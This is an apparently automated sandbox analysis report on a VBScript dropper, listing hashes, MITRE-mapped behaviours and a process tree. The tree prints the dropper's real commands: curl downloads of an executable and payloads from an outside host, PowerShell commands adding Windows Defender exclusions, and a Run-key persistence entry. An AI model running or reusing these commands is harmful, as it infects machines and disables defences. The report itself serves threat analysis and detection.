9ea7c3c92659815d5e7bad502969f0bb372ad2bafed99f74f92029550a34bf3c

Resubmissions

04/07/2023, 13:54

230704-q7g96afc6t 9

04/07/2023, 13:37

230704-qw6tdade47 9

Analysis

max time kernel
182s
max time network
172s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
04/07/2023, 13:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PROCESSO.ID-JRTWG.vbs
Size

848KB
MD5

64399ef6fd386370339714af907fe0fb
SHA1

1ab0b6ab453de23b55d1696d8b8cc3d6aae6f626
SHA256

f9204defdcfd9ed2193f8de8b753761710c3e0b8c5d11a7b3a0b2780ca79f3f3
SHA512

4c04cd36194fa83977c92b41a01efc5c5c67a18afbef5f03dc162612aac81a64c884e0903a54d0cc35527cdc3adc821fa3c8c6e82a61373f614faadc8d1b58f7
SSDEEP

48:Pa53Oc2YcEcrKZUiqzauma4oUpAM0GTDII1N:PadOc2YcEc+ZyzauP49xT0Q

Score

9^/10

evasion persistence themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	jHQ.l.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jHQ.l.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	jHQ.l.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2052	jHQ.l.exe

Loads dropped DLL 1 IoCs

pid	Process
2052	jHQ.l.exe

Themida packer 18 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x0008000000023235-174.dat	themida
behavioral2/files/0x0008000000023235-175.dat	themida
behavioral2/memory/2052-177-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-178-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-179-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-180-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-181-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-182-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-183-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-187-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-190-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-191-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-237-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-261-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-354-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-392-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-449-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida
behavioral2/memory/2052-525-0x0000000072510000-0x0000000074A1E000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jHQ.l.exe = "C:\\winxbywinxs\\jHQ.l.exe"	jHQ.l.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jHQ.l.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "77"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1420546310-613437930-2990200354-1000\{4449734D-97F1-4E8E-ADA8-C50A5B0C2874}	chrome.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5028	powershell.exe
5028	powershell.exe
2728	powershell.exe
2728	powershell.exe
3376	powershell.exe
3376	powershell.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe
2052	jHQ.l.exe

Suspicious behavior: LoadsDriver 64 IoCs

pid	Process
1908	Process not Found
2500	Process not Found
4988	Process not Found
2056	Process not Found
4568	Process not Found
556	Process not Found
732	Process not Found
2232	Process not Found
2992	Process not Found
3416	Process not Found
1980	Process not Found
448	Process not Found
520	Process not Found
3480	Process not Found
8	Process not Found
4636	Process not Found
3204	Process not Found
1308	Process not Found
1656	Process not Found
2180	Process not Found
3240	Process not Found
4604	Process not Found
616	Process not Found
1632	Process not Found
4260	Process not Found
224	Process not Found
892	Process not Found
4536	Process not Found
2256	Process not Found
4548	Process not Found
4052	Process not Found
1196	Process not Found
4248	Process not Found
3784	Process not Found
2220	Process not Found
5060	Process not Found
4940	Process not Found
4964	Process not Found
1336	Process not Found
1748	Process not Found
2560	Process not Found
3904	Process not Found
1068	Process not Found
5024	Process not Found
3796	Process not Found
1452	Process not Found
4524	Process not Found
756	Process not Found
1284	Process not Found
4292	Process not Found
1784	Process not Found
4992	Process not Found
3324	Process not Found
116	Process not Found
4244	Process not Found
2264	Process not Found
536	Process not Found
1236	Process not Found
2064	Process not Found
3512	Process not Found
3612	Process not Found
5008	Process not Found
2820	Process not Found
828	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe
Token: SeCreatePagefilePrivilege	2168	chrome.exe
Token: SeShutdownPrivilege	2168	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe
2168	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4984	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4940 wrote to memory of 4392	4940	WScript.exe	80
PID 4940 wrote to memory of 4392	4940	WScript.exe	80
PID 4392 wrote to memory of 3932	4392	cmd.exe	82
PID 4392 wrote to memory of 3932	4392	cmd.exe	82
PID 4940 wrote to memory of 1068	4940	WScript.exe	83
PID 4940 wrote to memory of 1068	4940	WScript.exe	83
PID 1068 wrote to memory of 5028	1068	cmd.exe	85
PID 1068 wrote to memory of 5028	1068	cmd.exe	85
PID 4940 wrote to memory of 4608	4940	WScript.exe	86
PID 4940 wrote to memory of 4608	4940	WScript.exe	86
PID 4608 wrote to memory of 2172	4608	cmd.exe	88
PID 4608 wrote to memory of 2172	4608	cmd.exe	88
PID 4940 wrote to memory of 1416	4940	WScript.exe	89
PID 4940 wrote to memory of 1416	4940	WScript.exe	89
PID 1416 wrote to memory of 2728	1416	cmd.exe	91
PID 1416 wrote to memory of 2728	1416	cmd.exe	91
PID 4940 wrote to memory of 4252	4940	WScript.exe	92
PID 4940 wrote to memory of 4252	4940	WScript.exe	92
PID 4252 wrote to memory of 2096	4252	cmd.exe	94
PID 4252 wrote to memory of 2096	4252	cmd.exe	94
PID 4940 wrote to memory of 3192	4940	WScript.exe	95
PID 4940 wrote to memory of 3192	4940	WScript.exe	95
PID 3192 wrote to memory of 3376	3192	cmd.exe	97
PID 3192 wrote to memory of 3376	3192	cmd.exe	97
PID 4940 wrote to memory of 400	4940	WScript.exe	98
PID 4940 wrote to memory of 400	4940	WScript.exe	98
PID 400 wrote to memory of 2052	400	cmd.exe	100
PID 400 wrote to memory of 2052	400	cmd.exe	100
PID 400 wrote to memory of 2052	400	cmd.exe	100
PID 2168 wrote to memory of 3752	2168	chrome.exe	104
PID 2168 wrote to memory of 3752	2168	chrome.exe	104
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106
PID 2168 wrote to memory of 4648	2168	chrome.exe	106

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PROCESSO.ID-JRTWG.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C curl http://downloadnovo.homelinux.com/download/jHQ.l.exe --output C:\winxbywinxs\jHQ.l.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\system32\curl.exe
    curl http://downloadnovo.homelinux.com/download/jHQ.l.exe --output C:\winxbywinxs\jHQ.l.exe
    3⤵
    PID:3932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C curl http://downloadnovo.homelinux.com/download/jHQ.l.ahk --output C:\winxbywinxs\jHQ.l.ahk
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4608
- - C:\Windows\system32\curl.exe
    curl http://downloadnovo.homelinux.com/download/jHQ.l.ahk --output C:\winxbywinxs\jHQ.l.ahk
    3⤵
    PID:2172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C curl http://downloadnovo.homelinux.com/download/UODKAUOOAKD.yFL --output C:\winxbywinxs\UODKAUOOAKD.yFL
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4252
- - C:\Windows\system32\curl.exe
    curl http://downloadnovo.homelinux.com/download/UODKAUOOAKD.yFL --output C:\winxbywinxs\UODKAUOOAKD.yFL
    3⤵
    PID:2096
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension '.yFL'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\winxbywinxs\jHQ.l.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\winxbywinxs\jHQ.l.exe
    C:\winxbywinxs\jHQ.l.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    PID:2052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff94f2c9758,0x7ff94f2c9768,0x7ff94f2c9778
  2⤵
  PID:3752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:2
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:3108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4592 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4776 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5064 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4924 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5224 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:4484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4868 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5272 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1856
